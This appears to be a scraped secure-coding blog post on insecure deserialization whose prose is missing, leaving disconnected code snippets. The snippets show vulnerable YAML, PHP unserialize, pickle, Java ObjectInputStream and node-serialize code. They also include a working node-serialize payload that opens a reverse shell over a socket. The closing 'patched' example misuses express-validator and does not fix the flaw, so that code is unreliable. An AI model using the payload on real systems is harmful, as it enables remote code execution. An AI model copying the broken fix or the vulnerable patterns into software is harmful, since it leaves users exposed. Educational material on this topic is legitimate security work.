Insecure Deserialization

Barış Ekin Yıldırım07 Jun 2022
Secure CodingAppSecInsecure Deserialization
end
  with_response response do |resp|
  owners = YAML.load resp.body

  say "Owners for gem: #{name}"
  owners.each do |owner|
function _validatePost(&$controller) {
  -- snip --
  $check = $controller->data;
  $token = urldecode($check['_Token']['fields']);

  if (strpos($token, ':')) {
    list ($token, $locked) = explode( ':', $token, 2 );
  }

  $locked = unserialize(str_rot13($locked));
  -- snip --
        suffix=self._fs_transaction_suffix, dir=self._path
       )
       with os.fdopen(fd, "wb") as f:
            pickle.dump(timeout, f, 1)
            pickle.dump(value, f, pickle.HIGHEST_PROTOCOL)
       os.replace(tmp, filename)
       os.chmod(filename, self._mode)
   except (IOError, OSError) as exc:
@RequestMapping("/impsave")
   @Menu(type = "admin" , subtype = "template" , access = false , admin = true)
   public ModelAndView impsave (ModelMap map , HttpServletRequest
request @RequestParam(value = "dataFile", required = false ) MultipartFile dataFile)
throws Exception {
     if(dataFile!=null && dataFile.getSize() > 0){
         List<Template> templateList = (List<Template>) MainUtils.toObject(dataFile.getBytes()) ;
         if(templateList!=null && templateList.size() > 0){
            templateRes.deleteInBatch(templateList);
            for(Template template : templateList){
               templateRes.save(template) ;
            }
         }
      }
      return request(super.createView("redirect:/admin/template/index.html"));
    }
public static Object toObject(byte[] data) throws Exception {
   ByteArrayInputStream input = new ByteArrayInputStream(data);
   ObjectInputStream objectInput = new ObjectInputStream(input);
   return objectInput.readObject();
}
var express = require('express');
var cookieParser = require('cookie-parser');
var escape = require('escape-html');
var serialize = require('node-serialize');
var app = express();

app.use(cookieParser())
app.get('/', function(req, res) {
   if (req.cookies.profile) {
      var str = new Buffer(req.cookies.profile, 'base64').toString();
      var obj = serialize.unserialize(str);

      if (obj.username) {
         res.send( "Hello " + escape(obj.username));
      }
   } else {
      res.cookie('profile', "eyJ1c2VybmFtZSI6ImFkbWluIiwiY29tcGFueSI6ImtvbmR1a3RvIiwibG9jYXRpb24iOiJjbG91ZGJhbmsifQ==" , {
         maxAge: 900000,
         httpOnly: true
      });
      res.send("Hello stranger");
   }
});

app.listen(3000);
res.send("Hello stranger");
{"username":"admin","company":"kondukto","location":"cloudbank"}
var str = new Buffer(req.cookies.profile, 'base64').toString();
var obj = serialize.unserialize(str);
if (obj.username) {
   res.send("Hello " + escape(obj.username));
}
{"rce":"_$$ND_FUNC$$_function() { var net = require('net'); var spawn =
require('child_process').spawn; HOST = \"127.0.0.1\"; PORT = \"3443\";
TIMEOUT = \"5000\"; if (typeof String.prototype.contains === 'undefined') { 
String.prototype.contains = function(it) { return this.indexOf(it) != -1;
}; } function c(HOST, PORT) { var client = new net.Socket();
client.connect(PORT, HOST, function() { var sh = spawn(\"sh\", []);
client.write(\"Connected!\"); client.pipe(sh.stdin);
sh.stdout.pipe(client); sh.stderr.pipe(client); sh.on('exit',
function(code, signal) { client.end(\"Disconnected!\"); }); });
client.on('error', function(e) { setTimeout(c(HOST, PORT), TIMEOUT); }); }
c(HOST, PORT);}( )"}
var express = require('express');
var cookieParser = require('cookie-parser');
var escape = require('escape-html');
var serialize = require('node-serialize');
const { check } = require('express-validator');

var app = express();

app.use(cookieParser())
app.get('/', function(req, res) {
   if (req.cookies.profile) {
      var str = new Buffer(req.cookies.profile, 'base64').toString();
      var patched = check(str).isString().escape().trim();
      var obj = serialize.unserialize(patched);

      if (obj) {
         res.send( "Hello " + escape(obj));
      }
   } else {
      res.cookie('profile', "eyJ1c2VybmFtZSI6ImFkbWluIiwiY29tcGFueSI6ImtvbmR1a3RvIiwibG9jYXRpb24iOiJjbG91ZGJhbmsifQ==" , {
         maxAge: 900000,
         httpOnly: true
      });
      res.send("Hello stranger");
   }
});

app.listen(3000);
const { check } = require('express-validator');

Get A Demo